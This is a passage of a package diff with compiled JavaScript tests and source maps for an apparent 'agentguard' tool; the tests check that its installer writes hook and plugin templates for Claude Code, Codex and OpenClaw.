AM,GAAG,MAAM,IAAA,sCAAuB,EAC1C,YAAY,CAAC,EAAE,QAAQ,EAAE,CAAC,EAAE,MAAM,EAAE,QAAQ,EAAE,CAAC,EAAE,CAAC,EAClD,EAAE,UAAU,EAAE,CAAC,IAAI,CAAC,EAAE,CACvB,CAAC;QACF,gBAAM,CAAC,KAAK,CAAC,MAAM,CAAC,gBAAgB,CAAC,MAAM,EAAE,CAAC,CAAC,CAAC;QAChD,gBAAM,CAAC,KAAK,CAAC,MAAM,CAAC,gBAAgB,CAAC,CAAC,CAAC,CAAC,SAAS,EAAE,QAAQ,CAAC,CAAC;QAC7D,gBAAM,CAAC,KAAK,CAAC,MAAM,CAAC,gBAAgB,CAAC,CAAC,CAAC,CAAC,IAAI,EAAE,QAAQ,CAAC,CAAC;IAC1D,CAAC,CAAC,CAAC;AACL,CAAC,CAAC,CAAC;AAEH,IAAA,oBAAQ,EAAC,eAAe,EAAE,GAAG,EAAE;IAC7B,IAAA,cAAE,EAAC,0BAA0B,EAAE,GAAG,EAAE;QAClC,gBAAM,CAAC,KAAK,CAAC,IAAA,4BAAa,EAAC,aAAa,EAAE,6BAA6B,CAAC,EAAE,IAAI,CAAC,CAAC;QAChF,gBAAM,CAAC,KAAK,CAAC,IAAA,4BAAa,EAAC,aAAa,EAAE,eAAe,CAAC,EAAE,KAAK,CAAC,CAAC;IACrE,CAAC,CAAC,CAAC;IAEH,IAAA,cAAE,EAAC,qCAAqC,EAAE,GAAG,EAAE;QAC7C,gBAAM,CAAC,KAAK,CAAC,IAAA,4BAAa,EAAC,EAAE,EAAE,UAAU,CAAC,EAAE,KAAK,CAAC,CAAC;QACnD,sDAAsD;QACtD,gBAAM,CAAC,KAAK,CAAC,IAAA,4BAAa,EAAC,IAAI,EAAE,UAAU,CAAC,EAAE,KAAK,CAAC,CAAC;IACvD,CAAC,CAAC,CAAC;IAEH,IAAA,cAAE,EAAC,4BAA4B,EAAE,GAAG,EAAE;QACpC,MAAM,IAAI,GAAG,GAAG,GAAG,GAAG,CAAC,MAAM,CAAC,GAAG,CAAC,GAAG,GAAG,CAAC;QACzC,gBAAM,CAAC,KAAK,CAAC,IAAA,4BAAa,EAAC,IAAI,EAAE,MAAM,CAAC,EAAE,KAAK,CAAC,CAAC;IACnD,CAAC,CAAC,CAAC;IAEH,IAAA,cAAE,EAAC,yDAAyD,EAAE,GAAG,EAAE;QACjE,gBAAM,CAAC,KAAK,CAAC,IAAA,4BAAa,EAAC,OAAO,EAAE,MAAM,CAAC,EAAE,KAAK,CAAC,CAAC;QACpD,gBAAM,CAAC,KAAK,CAAC,IAAA,4BAAa,EAAC,OAAO,EAAE,MAAM,CAAC,EAAE,KAAK,CAAC,CAAC;QACpD,gBAAM,CAAC,KAAK,CAAC,IAAA,4BAAa,EAAC,OAAO,EAAE,MAAM,CAAC,EAAE,KAAK,CAAC,CAAC;IACtD,CAAC,CAAC,CAAC;IAEH,IAAA,cAAE,EAAC,kCAAkC,EAAE,GAAG,EAAE;QAC1C,gBAAM,CAAC,KAAK,CAAC,IAAA,4BAAa,EAAC,WAAW,EAAE,MAAM,CAAC,EAAE,KAAK,CAAC,CAAC;IAC1D,CAAC,CAAC,CAAC;AACL,CAAC,CAAC,CAAC"}
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
{"version":3,"file":"installer.test.d.ts","sourceRoot":"","sources":["../../src/tests/installer.test.ts"],"names":[],"mappings":""}
|
|
@@ -0,0 +1,32 @@
|
|
|
1
|
+
"use strict";
|
|
2
|
+
var __importDefault = (this && this.__importDefault) || function (mod) {
|
|
3
|
+
return (mod && mod.__esModule) ? mod : { "default": mod };
|
|
4
|
+
};
|
|
5
|
+
Object.defineProperty(exports, "__esModule", { value: true });
|
|
6
|
+
const node_test_1 = require("node:test");
|
|
7
|
+
const strict_1 = __importDefault(require("node:assert/strict"));
|
|
8
|
+
const node_fs_1 = require("node:fs");
|
|
9
|
+
const node_path_1 = require("node:path");
|
|
10
|
+
const node_os_1 = require("node:os");
|
|
11
|
+
const installers_js_1 = require("../installers.js");
|
|
12
|
+
(0, node_test_1.describe)('Agent template installers', () => {
|
|
13
|
+
(0, node_test_1.it)('writes Claude Code hook and settings templates', () => {
|
|
14
|
+
const dir = (0, node_fs_1.mkdtempSync)((0, node_path_1.join)((0, node_os_1.tmpdir)(), 'agentguard-claude-'));
|
|
15
|
+
const result = (0, installers_js_1.installAgentTemplates)('claude-code', { cwd: dir });
|
|
16
|
+
strict_1.default.equal(result.files.length, 2);
|
|
17
|
+
strict_1.default.ok((0, node_fs_1.existsSync)((0, node_path_1.join)(dir, '.claude', 'hooks', 'agentguard-protect.sh')));
|
|
18
|
+
strict_1.default.ok((0, node_fs_1.readFileSync)((0, node_path_1.join)(dir, '.claude', 'settings.local.json'), 'utf8').includes('agentguard-protect.sh'));
|
|
19
|
+
});
|
|
20
|
+
(0, node_test_1.it)('writes Codex skill and hook templates', () => {
|
|
21
|
+
const dir = (0, node_fs_1.mkdtempSync)((0, node_path_1.join)((0, node_os_1.tmpdir)(), 'agentguard-codex-'));
|
|
22
|
+
(0, installers_js_1.installAgentTemplates)('codex', { cwd: dir });
|
|
23
|
+
strict_1.default.ok((0, node_fs_1.existsSync)((0, node_path_1.join)(dir, '.codex', 'skills', 'agentguard', 'SKILL.md')));
|
|
24
|
+
strict_1.default.ok((0, node_fs_1.readFileSync)((0, node_path_1.join)(dir, '.codex', 'agentguard-hook.example.json'), 'utf8').includes('AGENTGUARD_AGENT_HOST=codex'));
|
|
25
|
+
});
|
|
26
|
+
(0, node_test_1.it)('writes OpenClaw plugin template', () => {
|
|
27
|
+
const dir = (0, node_fs_1.mkdtempSync)((0, node_path_1.join)((0, node_os_1.tmpdir)(), 'agentguard-openclaw-'));
|
|
28
|
+
(0, installers_js_1.installAgentTemplates)('openclaw', { cwd: dir });
|
|
29
|
+
strict_1.default.ok((0, node_fs_1.readFileSync)((0, node_path_1.join)(dir, 'openclaw.agentguard.plugin.ts'), 'utf8').includes('registerOpenClawPlugin'));
|
|
30
|
+
});
|
|
31
|
+
});
|
|
32
|
+
//# sourceMappingURL=installer.test.js.map
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
{"version":3,"file":"installer.test.js","sourceRoot":"","sources":["../../src/tests/installer.test.ts"],"names":[],"mappings":";;;;;AAAA,yCAAyC;AACzC,gEAAwC;AACxC,qCAAgE;AAChE,yCAAiC;AACjC,qCAAiC;AACjC,oDAAyD;AAEzD,IAAA,oBAAQ,EAAC,2BAA2B,EAAE,GAAG,EAAE;IACzC,IAAA,cAAE,EAAC,gDAAgD,EAAE,GAAG,EAAE;QACxD,MAAM,GAAG,GAAG,IAAA,qBAAW,EAAC,IAAA,gBAAI,EAAC,IAAA,gBAAM,GAAE,EAAE,oBAAoB,CAAC,CAAC,CAAC;QAC9D,MAAM,MAAM,GAAG,IAAA,qCAAqB,EAAC,aAAa,EAAE,EAAE,GAAG,EAAE,GAAG,EAAE,CAAC,CAAC;QAElE,gBAAM,CAAC,KAAK,CAAC,MAAM,CAAC,KAAK,CAAC,MAAM,EAAE,CAAC,CAAC,CAAC;QACrC,gBAAM,CAAC,EAAE,CAAC,IAAA,oBAAU,EAAC,IAAA,gBAAI,EAAC,GAAG,EAAE,SAAS,EAAE,OAAO,EAAE,uBAAuB,CAAC,CAAC,CAAC,CAAC;QAC9E,gBAAM,CAAC,EAAE,CAAC,IAAA,sBAAY,EAAC,IAAA,gBAAI,EAAC,GAAG,EAAE,SAAS,EAAE,qBAAqB,CAAC,EAAE,MAAM,CAAC,CAAC,QAAQ,CAAC,uBAAuB,CAAC,CAAC,CAAC;IACjH,CAAC,CAAC,CAAC;IAEH,IAAA,cAAE,EAAC,uCAAuC,EAAE,GAAG,EAAE;QAC/C,MAAM,GAAG,GAAG,IAAA,qBAAW,EAAC,IAAA,gBAAI,EAAC,IAAA,gBAAM,GAAE,EAAE,mBAAmB,CAAC,CAAC,CAAC;QAC7D,IAAA,qCAAqB,EAAC,OAAO,EAAE,EAAE,GAAG,EAAE,GAAG,EAAE,CAAC,CAAC;QAE7C,gBAAM,CAAC,EAAE,CAAC,IAAA,oBAAU,EAAC,IAAA,gBAAI,EAAC,GAAG,EAAE,QAAQ,EAAE,QAAQ,EAAE,YAAY,EAAE,UAAU,CAAC,CAAC,CAAC,CAAC;QAC/E,gBAAM,CAAC,EAAE,CAAC,IAAA,sBAAY,EAAC,IAAA,gBAAI,EAAC,GAAG,EAAE,QAAQ,EAAE,8BAA8B,CAAC,EAAE,MAAM,CAAC,CAAC,QAAQ,CAAC,6BAA6B,CAAC,CAAC,CAAC;IAC/H,CAAC,CAAC,CAAC;IAEH,IAAA,cAAE,EAAC,iCAAiC,EAAE,GAAG,EAAE;QACzC,MAAM,GAAG,GAAG,IAAA,qBAAW,EAAC,IAAA,gBAAI,EAAC,IAAA,gBAAM,GAAE,EAAE,sBAAsB,CAAC,CAAC,CAAC;QAChE,IAAA,qCAAqB,EAAC,UAAU,EAAE,EAAE,GAAG,EAAE,GAAG,EAAE,CAAC,CAAC;QAEhD,gBAAM,CAAC,EAAE,CAAC,IAAA,sBAAY,EAAC,IAAA,gBAAI,EAAC,GAAG,EAAE,+BAA+B,CAAC,EAAE,MAAM,CAAC,CAAC,QAAQ,CAAC,wBAAwB,CAAC,CAAC,CAAC;IACjH,CAAC,CAAC,CAAC;AACL,CAAC,CAAC,CAAC"}
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
{"version":3,"file":"runtime-cloud.test.d.ts","sourceRoot":"","sources":["../../src/tests/runtime-cloud.test.ts"],"names":[],"mappings":""}
|